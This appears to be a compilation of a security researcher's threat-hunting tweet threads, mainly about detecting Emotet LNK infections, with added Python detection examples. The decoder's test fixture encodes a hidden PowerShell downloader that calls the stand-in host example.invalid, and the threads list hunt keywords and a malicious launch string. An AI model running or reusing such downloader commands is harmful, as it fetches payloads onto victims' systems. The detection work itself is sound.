Stephan Berger
May 9, 8 tweets, 5 min read
1/ @ESET (see tweet below) has reported that #Emotet uses LNK attachments for the initial infection vector.

We can download a sample from Bazaar by @abuse_ch for doing our own analysis (sample from 2022-05-02).

bazaar.abuse.ch/sample/ce7191e…

#CyberSecurity
2/ exiftool works very well to extract the target path and command-line arguments from the malicious LNK file:
3/ The analyzed sample from @Netskope calls PowerShell directly. However, in our sample, cmd.exe is called first, then PowerShell with a base64-encoded command argument.

Picture taken from here - an analysis worth reading:
netskope.com/blog/emotet-ne…
4/ This infection mechanism is an excellent opportunity to point out that PowerShell script block logging should be enabled globally.

The @splunk Threat Research Team has written a blog with related detections. Even if Splunk is not used as SIEM, have a look at the detections.
5/ For example, hunt inside the PS logs for the keyword "$DoIt", a function of the DKMC framework we also see repeatedly in our IR cases, or hunt for the keyword IWR (Invoke-WebRequest), which Emotet uses for downloading the second-stage code.

splunk.com/en_us/blog/sec…
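Tweets 3 to 5 together describe one detection workflow: the LNK hands cmd.exe a PowerShell command line with a base64-encoded argument, and script block logging plus a keyword hunt ("$DoIt", IWR) surfaces it. The example below is added here and is not code from the thread or from Splunk; it decodes such an argument the way PowerShell does (UTF-16LE under any prefix of -EncodedCommand) and runs the keyword hunt over the recovered text. The command line and script are constructed for the example.

```python
import base64
from typing import List, Optional

# Keywords the thread suggests hunting for in PowerShell script block logs.
HUNT_KEYWORDS = ["$DoIt", "IWR", "Invoke-WebRequest"]


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the PowerShell text hidden in a -EncodedCommand argument, or None.

    powershell.exe accepts any unambiguous prefix of -EncodedCommand
    (-e, -ec, -enc, ...), and the payload is base64 of UTF-16LE text.
    Tokenising on whitespace is enough for the constructed sample below."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lower()
        if not flag.startswith("-e"):
            continue
        tail = flag[2:]
        # "-ec" is a common spelling; "-ex..." (ExecutionPolicy) must not match.
        if tail == "c" or "ncodedcommand".startswith(tail):
            payload = tokens[i + 1].strip("\"'")
            try:
                return base64.b64decode(payload, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def hunt_keywords(script_text: str, keywords: List[str] = HUNT_KEYWORDS) -> List[str]:
    """Return the hunt keywords present in a (decoded) script block, case-insensitively."""
    lowered = script_text.lower()
    return [k for k in keywords if k.lower() in lowered]


# Constructed stand-in for the downloader stage (not a real Emotet script),
# encoded here so the example runs offline and exercises the decoder.
SAMPLE_SCRIPT = "IWR -Uri http://example.invalid/stage2 -OutFile $env:TEMP\\stage2.bin"
SAMPLE_CMDLINE = "cmd.exe /c powershell.exe -w hidden -enc " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")).decode()


def analyze_cmdline(cmdline: str) -> dict:
    """Decode the command line and report which hunt keywords it contains."""
    decoded = extract_encoded_command(cmdline)
    return {"decoded": decoded, "hits": hunt_keywords(decoded) if decoded else []}


if __name__ == "__main__":
    print(analyze_cmdline(SAMPLE_CMDLINE))
```

With script block logging enabled, the decoded text is what lands in the 4104 events, so the same keyword hunt applies directly to the logs without the decoding step.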
6/ Or use @velocidex for convenient hunting inside the PowerShell logs 🙏💙
7/ Coming back to Emotet, collect all ASEP (Auto-Start Extensibility Points) in your network and specifically look for services that have regsvr32.exe in the ImagePath.

#ThreatHunting
8/ The random names in the System32 directory should be easy to find.

(Image taken from the Netskope blog, see the third tweet for the link).
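For the hunt in tweets 7 and 8, here is an added example (not the thread's own tooling) that walks a list of collected service ASEP records, keeps those whose ImagePath invokes regsvr32.exe, and pulls out the DLL path and its parent directory so the random folder name under System32 stands out. The records are constructed; on a live host the same (name, ImagePath) pairs come from HKLM\SYSTEM\CurrentControlSet\Services, and the "looks random" flag is a coarse heuristic assumed for this example, not the thread's method.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed ASEP service records; the last one mimics the persistence the
# thread describes. Service and folder names are made up.
SAMPLE_SERVICES: List[Tuple[str, str]] = [
    ("Spooler", r"C:\Windows\System32\spoolsv.exe"),
    ("WinDefend", r'"C:\ProgramData\Microsoft\Windows Defender\platform\4.18\MsMpEng.exe"'),
    ("xqzvkrtb", r'C:\Windows\System32\regsvr32.exe /s "C:\Windows\System32\Lqhzwvtrkp\yqwxbnzv.dll"'),
]

# First drive-letter path ending in .dll/.ocx; quotes are optional.
DLL_ARG = re.compile(r'"?([A-Za-z]:\\[^"]+?\.(?:dll|ocx))"?', re.IGNORECASE)


def looks_random(name: str) -> bool:
    """Coarse heuristic (assumption for this example): a directory name with
    almost no vowels is unusual for a Windows component folder."""
    letters = [c for c in name.lower() if c.isalpha()]
    if not letters:
        return False
    vowels = sum(c in "aeiou" for c in letters)
    return vowels / len(letters) < 0.15


def hunt_regsvr32_services(services: List[Tuple[str, str]]) -> List[Dict]:
    """Return one finding per service whose ImagePath runs regsvr32.exe."""
    findings = []
    for name, image_path in services:
        if "regsvr32.exe" not in image_path.lower():
            continue
        m = DLL_ARG.search(image_path)
        dll: Optional[str] = m.group(1) if m else None
        dll_dir = dll.rsplit("\\", 2)[-2] if dll else None  # folder holding the DLL
        findings.append({
            "service": name,
            "dll": dll,
            "dll_dir": dll_dir,
            "in_system32": bool(dll and "\\system32\\" in dll.lower()),
            "dir_looks_random": looks_random(dll_dir) if dll_dir else False,
        })
    return findings


if __name__ == "__main__":
    for f in hunt_regsvr32_services(SAMPLE_SERVICES):
        print(f)
```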

Good luck 🍀


More from @malmoeb

May 8
1/ #ThreatHunting: @Avast mentions in its Q1 Threat Report that one-third of their observed rootkit activity is due to the Ring-3 rootkit R77.

Here are two hunting approaches to detect R77 on an infected system. 🧵

#CyberSecurity
2/ R77 is an open-source rootkit that attempts to hide its existence on the infected system at various levels (screenshot).

As stated on the GitHub repo, e.g., all entities where the name starts with "$77" are hidden.

github.com/bytecode77/r77…
3/ The installer creates two scheduled tasks for the 32-bit and the 64-bit r77 service, according to the GitHub Readme.

After running the installer on our lab system, no new scheduled task is visible inside the Tasks folder.
May 6
1/ As always, an excellently written blog post by @Mandiant.

In addition to the hunting strategies outlined in the blog, I see another hunting-angle that could be worthwhile. 🧵🥷

mandiant.com/resources/unc3…

#CyberSecurity
2/ The TA deployed the C2 agent "on opaque network appliances within the victim environment; think backdoors on SAN arrays, load balancers, and wireless access point controllers. These kinds of devices don’t support antivirus or endpoint detection and response tools (EDRs),
3/ subsequently leaving the underlying operating systems to vendors to manage."

The C2 agent on the compromised servers and systems uses DynDNS domains to communicate with the C2 server.

The use of an internal DNS server, which also logs the DNS queries over an extended
May 6
1/ #ThreatHunting: @SentinelOne blogged about a Chinese TA called Moshen Dragon that uses password filters to read plaintext passwords (when they are changed).

sentinelone.com/labs/moshen-dr…
2/ The idea of using a password filter to get plaintext passwords is not new and was (first?) documented back in 2013 by @mubix:

blog.carnal0wnage.com/2013/09/steali…
3/ Thanks to @spotheplanet's code, we can test this scenario in our lab (or use the project linked on the SentinelOne blog):

ired.team/offensive-secu…
Apr 28
1/ #Linux #Forensics: pssst... I will now reveal my favorite interview question for candidates who want to work in our IR team ;) "In the process list, I see a (running) binary, but the binary is no longer present on disc. How can I restore the original binary? (screenshot 👇)"
2/ Many candidates (and other analysts) I have spoken to did not know the (simple?) answer.

Under /proc/[pid]/exe, a 1:1 copy of the executed binary is stored! As you can see in the screenshot, the hash sums of both binaries match precisely.
3/ According to the proc(5) manpage:

"You can even type /proc/[pid]/exe to run another copy of the same executable that is being run by process [pid]."
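The recovery described above, as an added example that is not part of the thread: copy /proc/<pid>/exe to a file, note whether the kernel reports the original path as deleted, and compare hashes the way the screenshot does. It needs Linux; the self-check recovers the interpreter running the example itself.

```python
import hashlib
import os
import shutil
import tempfile
from typing import Dict


def sha256_of(path: str) -> str:
    """Streaming SHA-256 of a file."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def recover_binary(pid: int, dest: str) -> Dict:
    """Copy /proc/<pid>/exe to dest and report where the link pointed.

    The kernel serves the mapped image even after the file was unlinked;
    readlink() then returns the old path with a ' (deleted)' suffix, which is
    exactly the situation the interview question describes."""
    exe = f"/proc/{pid}/exe"
    target = os.readlink(exe)
    shutil.copyfile(exe, dest)  # reads through the link, so it works when the path is gone
    return {
        "target": target,
        "deleted": target.endswith(" (deleted)"),
        "sha256": sha256_of(dest),
    }


def self_check() -> bool:
    """Recover this process's own binary and confirm it hashes like the on-disk file."""
    with tempfile.TemporaryDirectory() as tmp:
        dest = os.path.join(tmp, "recovered.bin")
        info = recover_binary(os.getpid(), dest)
        if info["deleted"]:
            return True  # nothing left on disk to compare against
        return info["sha256"] == sha256_of(info["target"])


if __name__ == "__main__":
    print("recovered copy matches on-disk binary:", self_check())
```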
Apr 24
1/ #Azure #Hardening Tip #5: Legacy authentication to bypass MFA in Azure AD

"One of the most common methods used by attackers to gain access to Azure tenants is credential theft or password spraying with legacy authentication protocols. Legacy authentication protocols
2/ do not support MFA and (if enabled) can be used to gain access to hosted data and resources via Azure AD."

☝️Quote from the M-Trends 2022 Report.

A few weeks ago, I created a presentation titled "Attack target Azure", where these two points are also outlined as the most
3/ common methods (used by attackers) into Azure Tenants.

To better secure Azure Tenants, I recommend creating an evaluation of the applications that still use legacy authentication protocols. The use of these protocols should be prevented with Conditional Access Policies (CAP).
Apr 23
#ThreatHunting:

1/ When examining AutoRuns entries during an IR or CA - would you consider a Scheduled Task with the name COMSurrogate and with the following launch string as malicious (spoiler: it is 😉)?

"powershell.exe" -windowstyle hidden

#CyberSecurity #dfir
2/ @Malwarebytes has found out that the Colibri malware on Windows 10 systems (and up) drops a file called Get-Variable.exe in the path %APPDATA%\Local\Microsoft\WindowsApps.
3/ "It so happens that Get-Variable is a valid PowerShell cmdlet which is used to retrieve the value of a variable in the current console. Additionally, WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable command is issued on PowerShell